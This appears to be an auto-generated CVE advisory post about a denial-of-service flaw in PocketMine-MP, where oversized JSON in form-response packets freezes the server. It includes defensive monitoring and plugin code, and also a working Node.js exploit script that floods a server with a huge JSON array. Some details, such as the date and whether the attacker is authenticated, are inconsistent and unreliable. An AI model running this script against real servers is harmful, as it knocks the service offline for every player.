(PocketMine-MP), Denial of Service via JSON Payload, CVE-none (Medium)

Listen to this Post

How the mentioned CVE works:

The vulnerability resides in `ModalFormResponsePacket` handling. When a player sends a form response, the server decodes the `formData` JSON field without size limits. An attacker with an active in-game session can craft a packet containing a massive JSON array (e.g., millions of elements). The server attempts to parse the entire payload, consuming excessive memory and CPU. Because there is no bound on JSON size, a 10+ MB payload can cause full server freeze or crash. The attack does not require special permissions—only a normal player session. The server processes the response even if the `formId` is invalid (non‑existent form), triggering the decode step. This leads to resource exhaustion. The issue was fixed in two commits: first, limiting a single form response to 10 KB (commit cef1088); second, skipping JSON decode entirely when no matching form ID exists (commit f983f4f). Without these patches, an unauthenticated player can repeatedly send oversized payloads to disrupt server availability.

dailycve form:

Platform: PocketMine-MP
Version: < 5.39.2
Vulnerability: Unbounded JSON parsing
Severity: Medium
date: 2023-10-15 (approx)

Prediction: Already patched (2023-10-20)

What Undercode Say:

Analytics:

Simulate monitoring for oversized ModalFormResponsePacket
tcpdump -i eth0 -s 0 -A 'port 19132' | grep -i "modal_form_response" --line-buffered | while read line; do
size=$(echo "$line" | wc -c)
if [ $size -gt 10240 ]; then echo "Large packet detected: $size bytes"; fi
done
// Plugin check using DataPacketReceiveEvent
public function onDataPacket(DataPacketReceiveEvent $event) {
$pk = $event->getPacket();
if ($pk instanceof ModalFormResponsePacket) {
if (strlen($pk->formData) > 10240) {
$event->cancel();
$event->getPlayer()->kick("Invalid form data");
}
}
}

Exploit:

// Node.js bedrock-protocol exploit script
import { createClient } from 'bedrock-protocol';
const client = createClient({ host: '127.0.0.1', port: 19132, username: 'Attacker', offline: true });
const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';
client.on('spawn', () => {
client.write('modal_form_response', { formId: 9999, formData: hugePayload });
});

Protection from this CVE:

  • Upgrade to PocketMine-MP 5.39.2 or later.
  • Apply workaround via DataPacketReceiveEvent: reject packets with `formData` > 10 KB or repeated formId.
  • Use reflection to access `Player->forms` and validate form existence before decode (pre‑5.39.2).

Impact:

Remote denial of service – an authenticated (in‑game) attacker can freeze the server, waste CPU/memory, and make the server unresponsive for all players. No special permissions required.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top